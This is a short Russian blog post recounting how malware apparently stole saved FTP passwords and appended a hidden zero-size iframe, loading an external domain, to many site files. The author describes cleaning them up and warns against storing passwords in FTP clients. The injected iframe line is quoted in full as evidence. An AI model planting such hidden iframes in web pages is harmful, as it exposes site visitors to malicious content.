Вирус, вставляющий iframe

На днях случилось пренеприятнейшее событие. Какая-то сетевая зараза пробралась сквозь фаерволл и антивирус и, по всей видимости, украла пароли от всех FTP, сохранённых в клиенте. Причём в клиенте были пароли не только от моих сайтов, но и от клиентских.

С утра зайдя на блог я увидел какую-то ошибку интерпретатора PHP в файле wp-config.php. Сразу побежал смотреть что там и как. Оказалось, что в конце файла дописались следующие строки

<iframe width="0" height="0" frameborder="0" scrolling="no" src="http://click-clickc.com/index12"></iframe>

Начал вручную вычленять файлы по дате и чистить от этих строк. Потом оказалась что большая часть сайтов, которые были в FTP-клиенте с такой же проблемой. Через полчаса решил, что чистить руками сильно нерационально и написал небольшой скрипт, который делал это за меня.

Зараза прописывается в html, htm, php, cgi и т.д. Из всех сайтов нормально всё вычищалось и после этого работало, кроме сайтов на WordPress. Уж не знаю почему, но эта дрянь отрезала конец у некоторых файлов. Поковырял сайт, который в iframe — зареган у китайского регистратора. Решил не возиться.

В общем, всё обошлось. Клиенты, судя по всему, не успели заметить проблемы.

Мораль сказки такова — не храните пароли в FTP-клиентах, господа.